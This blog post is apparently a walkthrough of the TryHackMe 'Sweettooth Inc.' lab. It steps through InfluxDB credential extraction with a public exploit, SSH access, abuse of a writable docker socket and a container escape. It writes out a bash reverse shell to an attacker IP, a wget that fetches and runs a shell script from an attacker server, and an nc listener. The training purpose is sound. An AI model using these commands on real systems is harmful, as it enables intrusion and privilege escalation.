Open in app

Sign in

Write

Sign in

TryHackMe Sweettooth Inc. Writeup

Shivam Taneja
5 min readOct 31, 2022

Sweettooth Inc. Writeup

This writeup will help you solve the Sweettooth Inc. box on TryHackMe. Before we start enumerating the box, add the following line to your /etc/hosts file.

echo “<box_ip> sweettooth.thm” >> /etc/hosts

Enumeration

As per usual, we start by running a port scan on the host using nmap. The sC and
sV flags indicate that basic vulnerability scripts are executed against the target and that the port
scan tries to find version information.

nmap -sV -sC sweettooth.thm

You can read the output below:

PORT STATE SERVICE REASON VERSION

111/tcp open rpcbind syn-ack 2–4 (RPC #100000)

| rpcinfo:

| program version port/proto service

| 100000 2,3,4 111/tcp rpcbind

| 100000 2,3,4 111/udp rpcbind

| 100000 3,4 111/tcp6 rpcbind

| 100000 3,4 111/udp6 rpcbind

| 100024 1 36179/tcp6 status

| 100024 1 42728/tcp status

| 100024 1 49696/udp status

|_ 100024 1 58848/udp6 status

2222/tcp open ssh syn-ack OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)

| ssh-hostkey:

| 1024 b0:ce:c9:21:65:89:94:52:76:48:ce:d8:c8:fc:d4:ec (DSA)

| ssh-dss AAAAB3NzaC1kc3MAAACBALOlP9Bx9VQxs4JDY8vovlJp+l+pPX2MGttzN2gGNYABXAVSF9CA14OituA5tcJd5/Nv3Ru3Xyu8Yo5SV0d82rd7L/NF5Relx+iiVF+bigo329wbV3wsIrRQGUYHXiMjAs8WqQR+XKjOm3q4QLVxe/jU1I1ddy6/xO4fL7nOSh3RAAAAFQDKuQDe9pQtmnqvJkZ7QuCGm31+vQAAAIBENh/MS3oHvz1tCC4nZYwdAYZMBj2It0gYCMvD0oSkqL9IMaP9DIt/5G3D9ARrZPeSP4CqhfryIGHS7t59RNdnc3ukEsfJPo23bPBwWdIW7HXp9XDqyY1kD6L3Tq0bpeXpeXt6FQ93rFxncZngFkCrMD4+YytS532qPHMPOWh75gAAAIA7TohVech8kWTh6KIMl2Y61s9cwUqwrTkqJIYMdZ73nP69FD0bw08vyrdAwtVnsqRaNzsVVz9sBOOz3wmp/ZNI5NiuyA0UwEcxPj5k6jCn620gBpMEzVy6a8Ih3yRYHoiVMrQ/PIuoeIGxeYGckCorv8jSz2O3pq1Fnz23FRPH2A==

| 2048 7e:86:88:fe:42:4e:94:48:0a:aa:da:ab:34:61:3c:6e (RSA)

| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCbBmLBPg9mxkAdEbJGnz0v6Jzo4qdBcajkaIBKewKyz6OQTvyhVcDReSB2Dz0nl4mPCs3UN58hSNStCYXjZcpIBpqz2pHupVlqQ7u41Vo2W8u0nVFLt2U8JhTtA9wE6MA9GhitkN3Qorhxb3klCpSnWCDdcmkdNL0EYxZV53A52VWiNGX3vYkdMAKHAmp/VHvrsIeHozqflL8vD2UIoDmxDJwgXJRsr2iGVU1fL/Bu/DwlPwJkm50ua99yPpZbvCS9EwWki76aEtZSbcM4WHzx33Oe3tLXLCfKc9CJdIW35nBvpe5Dxl7gLR/mCHp2iTpdx1FmpSf+JjO/m2vKwL4X

| 256 04:1c:82:f6:a6:74:53:c9:c4:6f:25:37:4c:bf:8b:a8 (ECDSA)

| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHufHfqIZHVEKYC/yyNS+vTt35iULiIWoFNSQP/Bm/v90QzZjsYU9MSt7xdlR/2LZp9VWk32nl5JL65tvCMImxc=

| 256 49:4b:dc:e6:04:07:b6:d5:ab:c0:b0:a3:42:8e:87:b5 (ED25519)

|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJEYHtE8GbpGSlNB+/3IWfYRFrkJB+N9SmKs3Uh14pPj

8086/tcp open http syn-ack InfluxDB http admin 1.3.0

|_http-title: Site doesn’t have a title (text/plain; charset=utf-8).

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

There are 3 open ports. Port 111 serves RPCbind and port 2222 serves SSH. The most interesting port number is 8086, which serves a Database application called InfluxDB. Let’s try to enumerate this service first.

InfluxDB enumeration

The first task here is to find a valid username. Using the following link, I was able to find the username by browsing to: http://sweettooth.thm:8086/debug/requests. You should see the following JSON encoded response:

{

“REDACTED:127.0.0.1”: {“writes”:2,”queries”:2}

}

Now that we obtained the username, we should try to access data from the database. When searching for an InfluxDB vulnerability, I stumbled upon the following exploit. The exploit provides a tool to access the data from an InfluxDB database when a username is known. Run the following commands to install the exploit tool:

git clone https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933.git

cd InfluxDB-Exploit-CVE-2019–20933

python3 -m pip install -r requirements.txt

Now run python3 __main__.py to use the application. You should provide the IP address, the port number of the box machine and the just-found username. If you provide everything correctly, you should see the following output:

Databases list:

1) creds

2) docker

3) tanks

4) mixer

5) _internal

You can run use DATABASE_NAME to select a database. Furthermore, use the command show measurements to show the tables of a database. In order to find the temperature of the water tank at 1621346400 (UTC Unix Timestamp), we need to acquire all information from the tanks database. Run the following commands to acquire that data:

tanks

show measurements

select * from water_tank;

This shows us the water tank level for a lot of timestamps. Using: Epoch Converter we can find the time is the 18th of May at 14:00. Now check the database to find the following entry:

“2022–10–18T14:00:00Z”,

93.47,

REDACTED

],

After finding the temperature of the water, we should continue finding the highest rpm the mixer reached. To do so, run the following commands:

exit

mixer

show measurements

select * from mixer_stats

select max(motor_rpm) from mixer_stats

You can see the output below:

“values”: [

[

“2021–05–20T15:00:00Z”,

REDACTED

]

]

User Flag

Now on to the real work, let’s find a username within this database. There was a creds database. Let’s check its contents. Run the following command to view some credentials:

exit

creds

show measurements

select * from ssh

You can find the output below:

{

“results”: [

{

“series”: [

{

“columns”: [

“time”,

“pw”,

“user”

],

“name”: “ssh”,

“values”: [

[

“2022–10–16T12:00:00Z”,

REDACTED_PASSWORD,

“REDACTED_USERNAME”

]

]

}

],

“statement_id”: 0

}

]

}

Now you can log into the server using SSH. To do so, run:

ssh -p 2222 REDACTED_USER@sweettooth.thm

You can find the user.txt flag in the /home/REDACTED_USER directory.

Root Flag

Now that we have found the user.txt flag, let’s find the root.txt flag. When running linpeas.sh. I found the interesting file: /var/run/docker.sock which was writeable by the current user. Furthermore, when checking all the running processes with ps aux we can find that the docker container is running on port 8080. You can see a small snippet of ps aux below:

socat TCP-LISTEN:8080,reuseaddr,fork UNIX-CLIENT:/var/run/docker.sock

Now we can use SSH to forward the 8080 to our attacking machine, so we can inspect the running docker container. You can do so by running the following command on your attacking machine:

ssh -p 2222 uzJk6Ry98d8C@sweettooth.thm -L 8080:localhost:8080

Provide the password of the uzJk6Ry98d8C user. Now we can browse to http://localhost:8080/containers/json to find the container name: sweettoothinc. We can use this container name to execute commands within the docker container. Craft a reverse shell file on your attacking machine containing the following content:

bash -i >& /dev/tcp/ATTACKING_IP/9001>&1

Save this file as, for example, obz.sh. On your attacking machine, run python3 -m http.server to start a web server. In order to catch your reverse shell, run the following command in a new terminal on your attacking machine:

nc -lvnp 9001

You can download and run this file to the machine by running the following snippet:

docker -H localhost:8080 container exec sweettoothinc wget http://10.9.5.154:8000/shell.sh

docker -H localhost:8080 container exec sweettoothinc chmod +x shell.sh

docker -H localhost:8080 container exec sweettoothinc bash -i shell.sh

Go back to your listening netcat terminal and run:

passwd

obz

obz

After logging in as the uzJk6Ry98d8C user, you should now be able to change to the root user by running:

su root

Provide the obz password, and you should now be the root user within the docker container. You can find the root.txt flag at /root/root.txt

Escape!

The last part of completing this box consists of escaping the docker container. You can run the following command to find possible hard drives to mount:

fdisk -l

You can see the output below:

/dev/xvda1 * 2048 32088063 32086016 15.3G 83 Linux

/dev/xvda2 32090110 33552383 1462274 714M 5 Extended

/dev/xvda5 32090112 33552383 1462272 714M 82 Linux swap / Solaris

Usually, this should not be visible within a docker container. A docker container should not have knowledge of data outside the container. Knowing this, we can try to mount the hard drive within the docker container. Run the following code to mount /dev/xvda1 within the Linux docker:

mkdir /mnt/linux

mount /dev/xvda1 /mnt/linux

Success! You can find the final root.txt flag which is now located at: /mnt/linux/root/root.txt.

This box was interesting to root. You should update all your software to the latest version to prevent possible exploits. Furthermore, if you decide to use docker containers, make sure your docker container is secure. Most default configurations should be more secure than the ones found in this box.

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Tryhackme
Hacking
Coding
Linux
Python

Shivam Taneja
Shivam Taneja

Written by Shivam Taneja

28 Followers
17 Following

IT Security Consultant, Researcher, Penetration Tester & Hacker.

No responses yet

Write a response

What are your thoughts?

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams